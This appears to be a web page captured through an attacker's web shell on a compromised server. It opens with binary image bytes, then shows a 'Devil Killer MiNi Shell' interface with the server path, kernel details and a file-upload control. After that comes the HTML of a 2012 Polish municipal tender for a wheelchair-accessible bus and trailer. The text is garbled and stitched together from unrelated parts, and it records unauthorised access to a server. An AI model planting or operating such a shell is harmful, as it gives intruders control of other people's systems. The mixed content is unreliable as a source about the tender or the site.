JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121128/251787-N-2012.html

<p class="kh_header"><b>Frysztak: Dostawa autobusu przystosowanego do przewozu osób niepełnosprawnych  wraz z przyczepką do przewozu sprzętu w ramach projektu pn. Poszerzenie oferty kulturalnej Gminnego Ośrodka Kultury we Frysztaku z siedzibą w Twierdzy poprzez  modernizację  bazy i zakup wyposażenia służącego prowadzeniu działalności kulturalnej</b><br>
<b>Numer ogłoszenia: 251787 - 2012; data zamieszczenia: 28.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Frysztak , ul. Księdza Wojciecha Blajera 20, 38-130 Frysztak, tel. 017 27777110 w. 302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frysztak.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa autobusu przystosowanego do przewozu osób niepełnosprawnych  wraz z przyczepką do przewozu sprzętu w ramach projektu pn. Poszerzenie oferty kulturalnej Gminnego Ośrodka Kultury we Frysztaku z siedzibą w Twierdzy poprzez  modernizację  bazy i zakup wyposażenia służącego prowadzeniu działalności kulturalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres dostawy  związany z realizacją zadania obejmuję zakup i dostawę:
1.Autobusu, fabrycznie nowego (2013 rok), do przewozu: 1 kierowcy + 19 pasażerów w fotelach z możliwością przewozu 1 osoby na wózku inwalidzkim po demontażu ostatniego rzędu siedzeń dla pasażerów. Pojazd musi być również przystosowany do przewozu dzieci i młodzieży niepełnosprawnej. Wymagane jest, aby pojazd (autobus) wraz z systemem przewozu osób niepełnosprawnych, który zostanie zastosowany w autobusie posiadał homologację w tym zakresie ,spełniający normy EURO5. W cenę samochodu winno być wliczone ubezpieczenie autobusu (roczny pakiet OC, AC, NW).
Wymagane minimalne warunki techniczne autobusu:
1)Silnik:
a)wysokoprężny turbo diesel
b)pojemność skokowa silnika o oznaczeniu minimum 2200 cm3  
c)moc od  175 KM 
d)spełniający wymagania  EURO 5 
e)przepływowy podgrzewacz paliwa, 
f)filtr paliwa z separatorem wody,
g) dogrzewacz silnika
2)Napęd:
a) skrzynia biegów manualna, mechaniczna, zsynchronizowana 5 lub 6- biegowa,
b) sprzęgło suche jednotarczowe,
c) ESP.
3) Układ hamulcowy:
a) ABS, ASR, EBV.
b) dwuobwodowy, hydrauliczny ze wspomaganiem i korektorem hamowania,
c) hamulce tarczowe przednie i tylne wentylowane,
d) wskaźnik zużycia klocków hamulcowych.
4) Układ kierowniczy:
a) przekładnia z blokadą koła kierownicy,
b) wspomaganie układu kierowniczego,
5) Podwozie:
a) wzmocnione,
b) koła i ogumienie: 195/75 R16 C, opony letnie bez wyboru producenta plus pełnowymiarowe koło zapasowe, felgi stalowe z kołpakami, komplet opon zimowych z felgami, ogumienie bezdętkowe,
c) rozstaw osi min. 4200 mm, 
d) długość 6900 - 7500 mm, wysokość 2700 - 3000 mm, szerokość 1950 - 2100 mm,
6) Nadwozie:
a) 1 kierowca + 19 pasażerów w fotelach z możliwością przewozu 1 osoby na wózku inwalidzkim po demontażu ostatniego rzędu siedzeń dla pasażerów,
b) podłoga pokryta antypoślizgową wykładziną,
c) pełne przeszklenie przedziału pasażerskiego (szyby pojedyncze, wklejane stałe, przyciemnione fabrycznie, panoramiczne, termoizolacyjne),
d) szyba przednia ze szkła klejonego, z osłoną przeciwsłoneczną dla kierowcy i pasażera, 
e) zasłonki przeciwsłoneczne w oknach - na prowadnicach,
f) młoteczki do zbicia szyb umieszczone przy wyjściach ewakuacyjnych,
g) najazd szynowy umożliwiający wjazd wózków inwalidzkich z tyłu do autobusu,
h) uchwyty do mocowania wózka inwalidzkiego,
i) komplet pasów zabezpieczających wózek inwalidzki i pasażera w nim siedzącego,
j) trójpunktowe pasy bezpieczeństwa ze zwijaczami na wszystkie fotele pasażerów i kierowcy,
k) wyścielane fotele 2 i 1 osobowe z podłokietnikami, odchylane z regulowanymi na wysokość zagłówkami  wraz z regulacją kąta nachylenia oparcia. Fotele w ostatnim rzędzie mogą być bez regulacji oparć. Wszystkie fotele w kabinie pasażerskiej klasy turystycznej: fotel 2 osobowy ze składanym podłokietnikiem, odchylany z przesuwem bocznym; fotel 1 osobowy ze składanym podłokietnikiem, odchylany (Wykonawca zobowiązany do oferty załączyć fotografie proponowanych foteli),
l) mocowanie na listwach w celu szybkiego demontażu i przesuwania foteli,
ł) siedzenie kierowcy regulowane z dodatkowym podłokietnikiem i zagłówkiem
m)pokrycie ścian, słupków, sufitu tapicerką miękką z izolacją dźwiękowo- termiczną,
n)ogrzewanie niezależne od silnika o wydajności min. 4KW,
o)uchwyty ułatwiające wsiadanie zamontowane przy drzwiach wejściowych,
p)poręcz zabezpieczająca, znajdująca się przed fotelem zamontowanym przy drzwiach wejściowych,
r)wieszaki ubraniowe na słupkach bocznych,
s)półki na bagaż podręczny wraz z panelem oświetleniowo- nadmuchowym dla każdego pasażera,
t)oznakowanie jako pojazdu dla przewozu osób niepełnosprawnych z przodu i tyłu,
u)szyba za kierowcą,
w)szyby otwierane elektrycznie w drzwiach przednich,
x)szyberdach mechaniczny,
y)oświetlenie centralne,
z)oświetlenie stopnia bocznego- wejściowego, 
aa)elektryczne sterowanie lusterek bocznych,
ab)lusterko wewnętrzne,
ac)drzwi tylne, 
ad)drzwi boczne w części pasażerskiej z prawej strony przesuwne otwierane manualnie lub elektrycznie. Dopuszcza się także drzwi otwierane automatycznie,
ae) poduszka powietrzna kierowcy,
af) tachograf cyfrowy,
ag)radio z odtwarzaczem CD, nagłośnienie + instalacja ze wzmacniaczem i mikrofonem + min. 6 głośników,
ah) nadwozie z wysokim dachem,
ai) zderzak przedni i tylny w kolorze nadwozia,
aj)światła halogenowe przeciwmgielne,  
ak) klimatyzacja z manualną regulacją z rozprowadzeniem na przedział pasażerski,
al) parownik klimatyzacji umieszczony na dachu w osłonie w kolorze nadwozia,
ał)kufer bagażowy zamontowany w tylnej części autobusu na specjalnych zawiasach umożliwiających szybki demontaż bagażnika,
ał)wbudowana nawigacja z oprogramowaniem
7)Zabezpieczenie pojazdu: 
a) immobilizer,
b) zabezpieczenie drzwi przed otwarciem od wewnątrz,
c) autoalarm,
d) zamek centralny z możliwością otwarcia z pilota zamontowanego przy kluczyku,
8) Wyposażenie dodatkowe autobusu zgodne z wymogami przepisów  kodeksu ruchu  drogowego, w tym min. :
a)koło zapasowe, apteczka, trójkąt ostrzegawczy.
b)zestaw narzędzi i podnośnik hydrauliczny,
c)dodatkowa gaśnica o wadze 2 kg,

9)Gwarancja fabryczna:
a) minimum 3 lata na podzespoły mechaniczne bez limitu przebiegu  kilometrów,
b) minimum 5 lat na powłokę lakierniczą,
c)  minimum 8 lat na perforację nadwozia
Ponadto Zamawiający żąda udzielenia minimalnego okresu rękojmi za wady na wykonane dostawy obejmujące dostawę autobusu  w  ilości  36 miesięcy.
Wszelkie zastosowane materiały i wyposażenie muszą posiadać odpowiednie certyfikaty, oraz spełniać normy i przepisy w przewozie osobowym i osób  niepełnosprawnych.
10.Oferowany autobus musi: 
a) posiadać aktualne świadectwo homologacji wydane zgodnie z obowiązującymi przepisami prawa. Kserokopię świadectwa homologacji należy dołączyć do oferty. 
b) spełniać wymagania określone w Rozporządzeniu Ministra Infrastruktury z dnia 31.12.2002 r. w sprawie warunków technicznych pojazdu i ich wyposażenia (Dz. U. Nr 32 z 2003 r., poz. 262 z późn. zmianami). 
c) spełniać wymagania określone przez Zamawiającego w opisie technicznym SIWZ. 
d) Oferowany autobus zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 10.05.2011 roku w sprawie innych niż cena obowiązkowych kryteriów oceny ofert w odniesieniu do niektórych rodzajów zamówień publicznych (Dz.U. 2001 nr 96 poz. 559) musi spełniać następujące parametry: 
-max. zużycie paliwa od 10,8 do 13,8 l/100 km  przy pojemności silnika 2200-2800 cm3.
- maksymalny poziom zużycia energii podczas stałego cyklu użytkowania autobusu: 4,97 MJ/km; 
- maksymalny poziom emisji zanieczyszczeń CO2 :  368,16 g/km 
d)maksymalny poziom emisji zanieczyszczeń: 
NOx - 0,18 g/km, 
PM - 0,005 g/km, 
HC - 0,05 g/km 
e)Obliczenie zużycia energii w należy dokonać w oparciu o testy  SORT 2 opracowane przez International Association of Public Transport (UITP), określonych w sposób podany w § 7.2. Rozporządzenia  Prezesa Rady Ministrów z dnia 10 maja 2011 r.;
f)Obliczenia emisji drogowej dwutlenku węgla wyrażonej w g/km w teście SORT 2 określonej jako iloczyn zużycia paliwa wyrażonego w kg/100 km oraz liczby 31,1 dla silnika zasilanego olejem napędowym ,określonych w sposób podany w § 8.2. Rozporządzenia  Prezesa Rady Ministrów z dnia 10 maja 2011 r.;
g) Emisji jednostkowych, wyrażonych w g/km, tlenków azotu, cząstek stałych oraz
węglowodorów pochodzących ze świadectwa homologacji silnika oferowanego pojazdu
dla testu ETC (European Transient Cycle) lub testu WHTC (World Harmonized
Transient Cycle) wykonanego zgodnie z regulaminem 49 EKG ONZ lub równoważnych
mu przepisów europejskich ,określonych w sposób podany w § 9.3. Rozporządzenia  Prezesa Rady Ministrów z dnia 10 maja 2011 r.;
h)Wymagane powyżej parametry mają być oparte na wynikach testu zużycia paliwa SORT-2. Wyniki tego testu przeprowadzonego przez jednostkę certyfikowaną muszą zostać dołączone do oferty. 
i) Obliczenia przy założeniu cyklu życia pojazdu 800.000km 
Warunki, o których mowa w punkcie 1.3 będą spełnione, jeżeli Wykonawca złoży wraz z ofertą stosowne dokumenty lub oświadczenie potwierdzające spełnienie powyższych warunków. 
11)Wykonawca musi dodatkowo: 
a) przeszkolić 1 pracownika  Zamawiającego w zakresie obsługi i podstawowych napraw, 
b) wyposażyć Zamawiającego w kompletną dokumentację techniczno-eksploatacyjną. Całość dokumentacji musi być opracowana w języku polskim i przekazana w wersji papierowej oraz elektronicznej. 
c)dostarczyć dokumentację oprogramowania i instrukcje obsługi urządzeń zamontowanych w pojeździe. 

2.Przyczepki do przewozu sprzętu:
Wymiary wewnętrzne skrzyni :długość: 400-410cm,szerokość: 150-160 cm,wysokość burty (blacha ALU-CYNK): 35-40 cm, wysokość konstrukcji plandeki: min. 140 cm, koła: od 155R13 do 175R13. Przyczepka dwuosiowa, posiadająca homologację , wyposażona w kółko podporowe, hamulec najazdowy , komplet 2 kół zapasowych.
W cenę przyczepki winno być wliczone ubezpieczenie  (roczny pakiet OC, AC, NW).
Zamawiający żąda udzielenia minimalnego okresu rękojmi za wady na wykonane dostawy przyczepki w  ilości  36 miesięcy.
Wszelkie zastosowane materiały  muszą posiadać odpowiednie certyfikaty, oraz spełniać obowiązujące normy i przepisy ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.12.10.00-1, 34.22.33.10-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości  6 000 ,00 zł (Słownie: sześć  tysięcy złotych 00/100)
Wadium wnosi się przed upływem terminu składania ofert w jednej lub kilku formach
określonych w art. 45 ust.6 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu potwierdzenia, że spełnia warunek dotyczący posiadania wiedzy i doświadczenia, zobowiązany jest wykazać, że jako wykonawca świadczył w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy dostawę co najmniej jednego autobusu przystosowanego do przewozu osób niepełnosprawnych (19 osób + kierowca) o wartości netto minimum 200 000 zł   oraz załączy referencje, z których ma jednoznacznie wynikać: nazwa przedmiotu zamówienia, wartość przedmiotu zamówienia, datę realizacji zamówienia, kto był stroną zamawiającą  oraz stwierdzenie, że dostawa została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w celu potwierdzenia, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zobowiązany jest wykazać, że :
1.Posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 
250 000,00 PLN (słownie: dwieście pięćdziesiąt tysięcy złotych 00/100) lub w wysokości równoważnej dla walut obcych liczonej wg średniego kursu NBP na dzień wystawienia (nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) zaświadczenia lub innego dokumentu potwierdzającego wymaganą informację.
2.Posiada (o ile sam będzie wykonywał zamówienie) aktualną i opłaconą polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 250 000,00 zł. Spełnienie tego warunku udziału w postępowaniu będzie oceniane łącznie z dowodem zapłaty, o ile wprost z treści polisy, a w przypadku jej braku innego dokumentu, nie będzie wynikało, iż jest ona opłacona.
Wykonawca może polegać na  zdolnościach finansowych innych podmiotów,niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b ustawy Pzp).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
